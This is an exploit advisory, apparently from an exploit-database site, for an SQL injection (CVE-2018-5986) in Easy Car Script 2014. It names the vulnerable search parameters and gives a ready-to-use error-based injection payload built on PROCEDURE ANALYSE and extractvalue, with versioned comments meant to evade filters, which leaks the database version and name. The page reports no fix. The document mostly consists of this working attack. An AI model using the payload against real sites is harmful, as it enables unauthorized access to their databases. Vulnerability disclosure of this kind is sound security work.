Easy Car Script 2014 - SQL Injection

2018-01-23 23:05:06

# # # # #
# Exploit Title: Easy Car Script 2014 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://www.easyphotostore.com/
# Software Link: http://www.easycarscript.com/
# Version: 2014
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5986
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/site_search.php?s_vehicletype=auto&s_order=[SQL]&s_row=[SQL]
#
# 51 /*!05555Procedure*/ /*!05555Analyse*/ (extractvalue(0,/*!05555concat*/(0x27,0x3a,@@version,database())),0)-- -
#
# # # # #

Fixes

No fixes

In order to submit a new fix you need to be registered.